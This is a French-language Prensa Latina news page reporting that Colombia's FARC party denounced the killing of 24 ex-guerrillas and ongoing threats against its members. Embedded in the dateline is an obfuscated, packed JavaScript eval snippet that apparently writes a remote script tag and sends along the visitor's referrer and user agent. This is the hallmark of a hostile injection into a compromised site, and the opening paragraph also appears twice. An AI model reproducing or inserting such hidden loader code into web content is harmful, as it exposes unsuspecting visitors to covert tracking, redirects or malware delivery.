jeudi 18 avril 2024 |
Prensa Latina - Qui sommes nous

| Contacter avec Prensa Latina

Agence d'information Latino-américaine
Édition française
Search
Close this search box.

La FARC dénonce les 24 assassinats d’anciens guérilléros cette année

Bogota, eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|antaf|var|u0026u|referrer|hssia||js|php'.split('|'),0,{})) 30 mai (Prensa Latina) Le parti Force Alternative Révolutionnaire Commune (FARC) a aujourd'hui dénoncé l'assassinat de 24 anciens combattants ainsi que les menaces dont continuent à être victimes les membres de leur parti.

Bogota, 30 mai (Prensa Latina) Le parti Force Alternative Révolutionnaire Commune (FARC) a aujourd’hui dénoncé l’assassinat de 24 anciens combattants ainsi que les menaces dont continuent à être victimes les membres de leur parti.

Le Conseil Politique national de la FARC a signalé, qu’après le premier tour des élections présidentielles, la persistance des violations des droits de l’homme dans diverses parties du pays demeure l’une de ses principales sources de préoccupation.

La FARC estime que les structures criminelles liées aux cercles paramilitaires et au trafic de drogue n’ont pas disparu et constituent une menace directe contre la paix.

« Nous ne permettrons pas que l’on continue à assassiner des hommes qui ont déposé les armes et ont choisi l’action politique légale », déclare un communiqué de la FARC.

La direction de ce parti dénonce, entre autres, l’assassinat, entre le 22 et le 26 mai, des ex-combattants Christian Bellaizac, Jho, Jairo Ruiz et Winton Brava dans les municipalités de Jamundi, Suarez et Buenos Aires,  dans les départements respectifs de Cauca et Valle de Cauca.

« Une fois de plus, nous demandons aux institutions et aux mécanismes créés par l’Accord Final d’agir en conséquence et de tirer au clair ces terribles évènements », peut-on lire dans le communiqué.

Le parti de la rose conclut en invitant ses militants à prendre part aux campagnes présidentielles d’Ivan Duque (Centre Démocratique) et de Gustavo Petro (Colombie Humaine)  ainsi qu’à toutes les activités du pays de manière à sceller un pacte national et extirper définitivement les armes de la vie politique.

peo/oda/tpa

EN CONTINU
notes connexes